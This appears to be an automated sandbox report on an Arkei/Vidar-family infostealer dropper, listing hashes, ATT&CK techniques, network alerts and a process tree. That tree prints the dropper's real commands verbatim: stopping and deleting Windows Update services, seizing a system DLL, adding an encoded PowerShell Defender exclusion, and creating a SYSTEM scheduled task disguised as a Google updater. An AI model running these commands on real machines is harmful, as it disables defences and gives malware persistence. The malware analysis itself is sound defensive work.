arkei | 641438e98f1ea2def285e5ba391435bf4b96bc95e351cfacf7be1c5729e7e365

Analysis

max time kernel
188s
max time network
195s
platform
windows7_x64
resource
win7-20220414-en
submitted
08-07-2022 13:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Malware_Dropper.exe
Size

20.5MB
MD5

59d02f49a025628102ce6f5614c88f9f
SHA1

72d54917f8532bb434f645f09ede4e8cf9fcabed
SHA256

641438e98f1ea2def285e5ba391435bf4b96bc95e351cfacf7be1c5729e7e365
SHA512

48dcda93fb6eb51d772b1387eb3ae956259b39d5fb9fd37b6a41e13c23a5885cc2fbcde1bca65c0c64c397faf90d0cc222959594718f33638188ec6adc61511a

Score

10^/10

arkei default discovery evasion exploit spyware stealer suricata

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

Malware_Dropper.exe

description pid process target process

PID 1236 created 1204 1236 Malware_Dropper.exe Explorer.EXE
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata
suricata: ET MALWARE Win32/Vidar Variant/Mars CnC Activity (GET)
suricata: ET MALWARE Win32/Vidar Variant/Mars CnC Activity (GET)
suricata
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata
Drops file in Drivers directory 1 IoCs

Processes:

yolo.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts yolo.exe
Executes dropped EXE 2 IoCs

Processes:

yolo.exeUnamDownloader.exe

pid process

628 yolo.exe
1648 UnamDownloader.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

368 takeown.exe
844 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

108 cmd.exe

description	pid	process	target process
PID 1236 created 1204	1236	Malware_Dropper.exe	Explorer.EXE

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	yolo.exe

pid	process
628	yolo.exe
1648	UnamDownloader.exe

pid	process
368	takeown.exe
844	icacls.exe

pid	process
108	cmd.exe

Loads dropped DLL 8 IoCs

Processes:

Malware_Dropper.exeMalware_Dropper.exeUnamDownloader.exe

pid	process
1236	Malware_Dropper.exe
1864
1864
1236	Malware_Dropper.exe
1980	Malware_Dropper.exe
1980	Malware_Dropper.exe
1648	UnamDownloader.exe
1648	UnamDownloader.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

368 takeown.exe
844 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
368	takeown.exe
844	icacls.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Malware_Dropper.exe

description pid process target process

PID 1236 set thread context of 1980 1236 Malware_Dropper.exe Malware_Dropper.exe

description	pid	process	target process
PID 1236 set thread context of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe

Drops file in Program Files directory 2 IoCs

Processes:

yolo.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	yolo.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	yolo.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1384 sc.exe
1668 sc.exe
1104 sc.exe
1564 sc.exe
1588 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1384	sc.exe
1668	sc.exe
1104	sc.exe
1564	sc.exe
1588	sc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Malware_Dropper.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Malware_Dropper.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Malware_Dropper.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1384 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1952 timeout.exe

pid	process
1384	schtasks.exe

pid	process
1952	timeout.exe

Modifies registry class 30 IoCs

Processes:

UnamDownloader.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0100000000000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 = 74003100000000008e5405a01100557365727300600008000400efbeee3a851a8e5405a02a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0 = 4c00310000000000e954380110204c6f63616c00380008000400efbe8e5405a0e95438012a000000000200000000020000000000000000000000000000004c006f00630061006c00000014000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\0\MRUListEx = ffffffff	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\0 = 4a00310000000000e9545901102054656d700000360008000400efbe8e5405a0e95459012a00000001020000000002000000000000000000000000000000540065006d007000000014000000	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_Classes\Local Settings	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0\0\0\NodeSlot = "2"	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 = 52003100000000008e5405a0122041707044617461003c0008000400efbe8e5405a08e5405a02a000000ed0100000000020000000000000000000000000000004100700070004400610074006100000016000000	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	UnamDownloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 = 4c003100000000008e54e0b0100041646d696e00380008000400efbe8e5405a08e54e0b02a00000033000000000003000000000000000000000000000000410064006d0069006e00000014000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	UnamDownloader.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

680 reg.exe
1952 reg.exe
1484 reg.exe
1520 reg.exe
568 reg.exe
524 reg.exe
1136 reg.exe
1768 reg.exe
1052 reg.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exeyolo.exe

pid process

560 powershell.exe
628 yolo.exe

pid	process
680	reg.exe
1952	reg.exe
1484	reg.exe
1520	reg.exe
568	reg.exe
524	reg.exe
1136	reg.exe
1768	reg.exe
1052	reg.exe

pid	process
560	powershell.exe
628	yolo.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exeyolo.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	560	powershell.exe
Token: SeDebugPrivilege	628	yolo.exe
Token: SeShutdownPrivilege	1156	powercfg.exe
Token: SeShutdownPrivilege	688	powercfg.exe
Token: SeShutdownPrivilege	524	powercfg.exe
Token: SeShutdownPrivilege	1136	powercfg.exe
Token: SeTakeOwnershipPrivilege	368	takeown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

UnamDownloader.exe

pid process

1648 UnamDownloader.exe

pid	process
1648	UnamDownloader.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Malware_Dropper.exeyolo.execmd.execmd.exe

description	pid	process	target process
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 1980	1236	Malware_Dropper.exe	Malware_Dropper.exe
PID 1236 wrote to memory of 628	1236	Malware_Dropper.exe	yolo.exe
PID 1236 wrote to memory of 628	1236	Malware_Dropper.exe	yolo.exe
PID 1236 wrote to memory of 628	1236	Malware_Dropper.exe	yolo.exe
PID 1236 wrote to memory of 628	1236	Malware_Dropper.exe	yolo.exe
PID 1236 wrote to memory of 1648	1236	Malware_Dropper.exe	UnamDownloader.exe
PID 1236 wrote to memory of 1648	1236	Malware_Dropper.exe	UnamDownloader.exe
PID 1236 wrote to memory of 1648	1236	Malware_Dropper.exe	UnamDownloader.exe
PID 1236 wrote to memory of 1648	1236	Malware_Dropper.exe	UnamDownloader.exe
PID 628 wrote to memory of 560	628	yolo.exe	powershell.exe
PID 628 wrote to memory of 560	628	yolo.exe	powershell.exe
PID 628 wrote to memory of 560	628	yolo.exe	powershell.exe
PID 628 wrote to memory of 1788	628	yolo.exe	cmd.exe
PID 628 wrote to memory of 1788	628	yolo.exe	cmd.exe
PID 628 wrote to memory of 1788	628	yolo.exe	cmd.exe
PID 628 wrote to memory of 1812	628	yolo.exe	cmd.exe
PID 628 wrote to memory of 1812	628	yolo.exe	cmd.exe
PID 628 wrote to memory of 1812	628	yolo.exe	cmd.exe
PID 1812 wrote to memory of 1156	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 1156	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 1156	1812	cmd.exe	powercfg.exe
PID 1788 wrote to memory of 1104	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1104	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1104	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1564	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1564	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1564	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1588	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1588	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1588	1788	cmd.exe	sc.exe
PID 1812 wrote to memory of 688	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 688	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 688	1812	cmd.exe	powercfg.exe
PID 1788 wrote to memory of 1384	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1384	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1384	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1668	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1668	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1668	1788	cmd.exe	sc.exe
PID 1788 wrote to memory of 1052	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 1052	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 1052	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 1484	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 1484	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 1484	1788	cmd.exe	reg.exe
PID 1812 wrote to memory of 524	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 524	1812	cmd.exe	powercfg.exe
PID 1812 wrote to memory of 524	1812	cmd.exe	powercfg.exe
PID 1788 wrote to memory of 680	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 680	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 680	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 1520	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 1520	1788	cmd.exe	reg.exe
PID 1788 wrote to memory of 1520	1788	cmd.exe	reg.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204

C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1236

C:\Users\Admin\AppData\Local\Temp\yolo.exe
"C:\Users\Admin\AppData\Local\Temp\yolo.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdQBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAeABrACMAPgA="
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1104

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1564

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1588

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1384

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1668

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1052

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1484

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:680

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1520

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:568

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:368

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:844

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:524

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1952

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1136

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1768

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:620

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1488

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:600

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1296

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1964

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1432

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:688

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
PID:1916

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
5⤵
- Creates scheduled task(s)
PID:1384

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1584

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
PID:472

C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe
"C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1648

C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe"
2⤵
- Loads dropped DLL
- Checks processor information in registry
PID:1980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Malware_Dropper.exe" & exit
3⤵
- Deletes itself
PID:108

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
4⤵
- Delays execution with timeout.exe
PID:1952

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe
Filesize
9.4MB

MD5
d506f597b337bb21d0be9638873e1cae

SHA1
cf43f7ebe1e2bfeada1d04edee631cfc05eaf9bf

SHA256
729ef000683d0903141c1031fb3eeed340a4635a3f0b489d0df396d5065a36e0

SHA512
fc833c5a7fce6b577336948e9ddaceac41a4543311de50d79d7edd00bc318c1eba4ad5951fcccd26cfc0fa990ab81a30178d4b2a2968f4a7960a6b73cea2d353

Download Submit
C:\Users\Admin\AppData\Local\Temp\UnamDownloader.exe
Filesize
9.4MB

MD5
d506f597b337bb21d0be9638873e1cae

SHA1
cf43f7ebe1e2bfeada1d04edee631cfc05eaf9bf

SHA256
729ef000683d0903141c1031fb3eeed340a4635a3f0b489d0df396d5065a36e0

SHA512
fc833c5a7fce6b577336948e9ddaceac41a4543311de50d79d7edd00bc318c1eba4ad5951fcccd26cfc0fa990ab81a30178d4b2a2968f4a7960a6b73cea2d353

Download Submit
C:\Users\Admin\AppData\Local\Temp\yolo.exe
Filesize
4.1MB

MD5
990a78c9a169695677130e6f6aaf4ee4

SHA1
